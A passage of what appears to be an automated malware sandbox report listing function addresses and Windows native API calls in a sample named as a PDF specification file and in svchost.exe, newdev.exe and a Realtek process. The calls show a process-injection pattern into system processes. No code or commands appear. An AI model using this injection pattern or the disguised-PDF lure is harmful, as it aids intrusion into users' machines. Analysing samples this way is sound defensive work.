              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AA0 NtQueryInformationFile,1_2_03C72AA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72A10 NtWriteFile,1_2_03C72A10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C729D0 NtWaitForSingleObject,1_2_03C729D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C729F0 NtReadFile,1_2_03C729F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FB0 NtSetValueKey,1_2_03C72FB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F00 NtCreateFile,1_2_03C72F00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F30 NtOpenDirectoryObject,1_2_03C72F30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EC0 NtQuerySection,1_2_03C72EC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72ED0 NtResumeThread,1_2_03C72ED0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E80 NtCreateProcessEx,1_2_03C72E80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E50 NtCreateSection,1_2_03C72E50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E00 NtQueueApcThread,1_2_03C72E00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DC0 NtAdjustPrivilegesToken,1_2_03C72DC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DA0 NtReadVirtualMemory,1_2_03C72DA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D50 NtWriteVirtualMemory,1_2_03C72D50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CD0 NtEnumerateKey,1_2_03C72CD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CF0 NtDelayExecution,1_2_03C72CF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C50 NtUnmapViewOfSection,1_2_03C72C50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C10 NtOpenProcess,1_2_03C72C10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C20 NtSetInformationFile,1_2_03C72C20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C30 NtMapViewOfSection,1_2_03C72C30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C738D0 NtGetContextThread,1_2_03C738D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73C90 NtOpenThread,1_2_03C73C90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73C30 NtOpenProcessToken,1_2_03C73C30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D23540 NtSetContextThread,1_2_04D23540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D23850 NtSuspendThread,1_2_04D23850
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D23B60 NtResumeThread,1_2_04D23B60
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2CF0 NtDelayExecution,LdrInitializeThunk,3_2_04BB2CF0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2C30 NtMapViewOfSection,LdrInitializeThunk,3_2_04BB2C30
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_04BB2D10
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2E50 NtCreateSection,LdrInitializeThunk,3_2_04BB2E50
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2F00 NtCreateFile,LdrInitializeThunk,3_2_04BB2F00
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB29F0 NtReadFile,LdrInitializeThunk,3_2_04BB29F0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2A80 NtClose,LdrInitializeThunk,3_2_04BB2A80
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2AC0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04BB2AC0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2A10 NtWriteFile,LdrInitializeThunk,3_2_04BB2A10
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04BB2B90
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2B80 NtCreateKey,LdrInitializeThunk,3_2_04BB2B80
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_04BB2BC0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2B10 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04BB2B10
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2B00 NtQueryValueKey,LdrInitializeThunk,3_2_04BB2B00
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB34E0 NtCreateMutant,LdrInitializeThunk,3_2_04BB34E0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB4570 NtSuspendThread,3_2_04BB4570
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB4260 NtSetContextThread,3_2_04BB4260
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2CD0 NtEnumerateKey,3_2_04BB2CD0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2C20 NtSetInformationFile,3_2_04BB2C20
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2C10 NtOpenProcess,3_2_04BB2C10
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2C50 NtUnmapViewOfSection,3_2_04BB2C50
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2DA0 NtReadVirtualMemory,3_2_04BB2DA0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2DC0 NtAdjustPrivilegesToken,3_2_04BB2DC0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2D50 NtWriteVirtualMemory,3_2_04BB2D50
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2EB0 NtProtectVirtualMemory,3_2_04BB2EB0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2E80 NtCreateProcessEx,3_2_04BB2E80
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2ED0 NtResumeThread,3_2_04BB2ED0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2EC0 NtQuerySection,3_2_04BB2EC0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2E00 NtQueueApcThread,3_2_04BB2E00
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2FB0 NtSetValueKey,3_2_04BB2FB0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2F30 NtOpenDirectoryObject,3_2_04BB2F30
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB29D0 NtWaitForSingleObject,3_2_04BB29D0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2AA0 NtQueryInformationFile,3_2_04BB2AA0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2BE0 NtQueryVirtualMemory,3_2_04BB2BE0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB2B20 NtQueryInformationProcess,3_2_04BB2B20
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB3C90 NtOpenThread,3_2_04BB3C90
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB3C30 NtOpenProcessToken,3_2_04BB3C30
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB38D0 NtGetContextThread,3_2_04BB38D0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_0493EF68 NtQueryInformationProcess,NtReadVirtualMemory,3_2_0493EF68
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04943548 NtSetContextThread,3_2_04943548
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04944564 NtMapViewOfSection,3_2_04944564
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04944718 NtMapViewOfSection,3_2_04944718
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04943E78 NtQueueApcThread,3_2_04943E78
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04943858 NtSuspendThread,3_2_04943858
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04944928 NtUnmapViewOfSection,3_2_04944928
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04943B68 NtResumeThread,3_2_04943B68
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00386606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00386606
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037ACC5 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0037ACC5
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003879D3
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0036B0430_2_0036B043
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003532000_2_00353200
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00353B700_2_00353B70
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037410F0_2_0037410F
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003602A40_2_003602A4
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037038E0_2_0037038E
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0034E3E30_2_0034E3E3
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037467F0_2_0037467F
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003606D90_2_003606D9
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003AAACE0_2_003AAACE
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00374BEF0_2_00374BEF
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0036CCC10_2_0036CCC1
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00346F070_2_00346F07
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0034AF500_2_0034AF50
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0035B11F0_2_0035B11F
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003A31BC0_2_003A31BC
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0036D1B90_2_0036D1B9
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0036123A0_2_0036123A
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037724D0_2_0037724D
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003493F00_2_003493F0
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003813CA0_2_003813CA
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0035F5630_2_0035F563
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003496C00_2_003496C0
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038B6CC0_2_0038B6CC
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003477B00_2_003477B0
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003AF7FF0_2_003AF7FF
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003779C90_2_003779C9
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0035FA570_2_0035FA57
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00347D190_2_00347D19
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0035FE6F0_2_0035FE6F
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00369ED00_2_00369ED0
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00347FA30_2_00347FA3
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_020E35F00_2_020E35F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004185A31_2_004185A3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E0D71_2_0040E0D7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010E01_2_004010E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E0E31_2_0040E0E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004022401_2_00402240
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040441A1_2_0040441A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025401_2_00402540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FD5A1_2_0040FD5A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FD631_2_0040FD63
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042ED931_2_0042ED93
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402EF01_2_00402EF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF831_2_0040FF83
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041678E1_2_0041678E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167931_2_00416793
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF931_2_0040DF93
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3101_2_03C4E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C022451_2_03C02245
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0010E1_2_03D0010E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C300A01_2_03C300A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEE0761_2_03CEE076
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF67571_2_03CF6757
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4A7601_2_03C4A760
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C427601_2_03C42760
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA6C01_2_03CFA6C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C6E01_2_03C3C6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C406801_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C646701_2_03C64670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C6001_2_03C5C600
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0A5261_2_03D0A526
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C404451_2_03C40445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4BC01_2_03CB4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40B101_2_03C40B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEA5B1_2_03CFEA5B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFCA131_2_03CFCA13
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3E9A01_2_03C3E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFE9A61_2_03CFE9A6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C01_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C568821_2_03C56882
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C268681_2_03C26868
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E8101_2_03C6E810
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE08351_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE01_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEFBF1_2_03CFEFBF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4CF001_2_03C4CF00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32EE81_2_03C32EE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0EAD1_2_03CF0EAD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C82E481_2_03C82E48
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60E501_2_03C60E50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0E6D1_2_03CE0E6D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52DB01_2_03C52DB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40D691_2_03C40D69
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3AD001_2_03C3AD00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58CDF1_2_03C58CDF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0ACEB1_2_03D0ACEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEEC4C1_2_03CEEC4C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF6C691_2_03CF6C69
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEC601_2_03CFEC60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30C121_2_03C30C12
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4AC201_2_03C4AC20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBEC201_2_03CBEC20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C313801_2_03C31380
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF3301_2_03CFF330
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2D2EC1_2_03C2D2EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF124C1_2_03CF124C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C451C01_2_03C451C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B1E01_2_03C5B1E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8717A1_2_03C8717A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2F1131_2_03C2F113
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDD1301_2_03CDD130
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4B0D01_2_03C4B0D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF70F11_2_03CF70F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7508C1_2_03C7508C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB36EC1_2_03CB36EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF6F61_2_03CFF6F6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CED6461_2_03CED646
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDD62C1_2_03CDD62C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF5C91_2_03CFF5C9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF75C61_2_03CF75C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAD4801_2_03CAD480
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7DB191_2_03C7DB19
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFB2E1_2_03CFFB2E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFA891_2_03CFFA89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FAA01_2_03C5FAA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C859C01_2_03C859C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C099E81_2_03C099E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF18DA1_2_03CF18DA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF78F31_2_03CF78F3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB98B21_2_03CB98B2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C498701_2_03C49870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B8701_2_03C5B870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB58701_2_03CB5870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF8721_2_03CFF872
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C438001_2_03C43800
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF1FC61_2_03CF1FC6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBFF401_2_03CBFF40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFF631_2_03CFFF63
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF9ED21_2_03CF9ED2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C41EB21_2_03C41EB2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C49DD01_2_03C49DD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDFDF41_2_03CDFDF4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7D4C1_2_03CF7D4C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFD271_2_03CFFD27
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC7CE81_2_03CC7CE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FCE01_2_03C5FCE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD9C981_2_03CD9C98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C43C601_2_03C43C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D1E6A91_2_04D1E6A9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D252EC1_2_04D252EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D1E2881_2_04D1E288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D1E3A41_2_04D1E3A4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D1D8081_2_04D1D808
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_032B43A42_2_032B43A4
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_032B46A92_2_032B46A9
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_032B42882_2_032B4288
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_032BB2EC2_2_032BB2EC
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_032B38082_2_032B3808
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B804453_2_04B80445
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C4A5263_2_04C4A526
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3A6C03_2_04C3A6C0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B806803_2_04B80680
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B7C6E03_2_04B7C6E0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B9C6003_2_04B9C600
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BA46703_2_04BA4670
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C367573_2_04C36757
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B8A7603_2_04B8A760
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B827603_2_04B82760
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B700A03_2_04B700A0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C2E0763_2_04C2E076
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C4010E3_2_04C4010E
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B422453_2_04B42245
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B8E3103_2_04B8E310
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C4ACEB3_2_04C4ACEB
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B98CDF3_2_04B98CDF
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C2EC4C3_2_04C2EC4C
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B8AC203_2_04B8AC20
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BFEC203_2_04BFEC20
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3EC603_2_04C3EC60
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B70C123_2_04B70C12
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C36C693_2_04C36C69
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B92DB03_2_04B92DB0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B7AD003_2_04B7AD00
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B80D693_2_04B80D69
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B72EE83_2_04B72EE8
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C30EAD3_2_04C30EAD
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C20E6D3_2_04C20E6D
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BA0E503_2_04BA0E50
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BC2E483_2_04BC2E48
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B86FE03_2_04B86FE0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3EFBF3_2_04C3EFBF
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B8CF003_2_04B8CF00
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B968823_2_04B96882
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B828C03_2_04B828C0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BAE8103_2_04BAE810
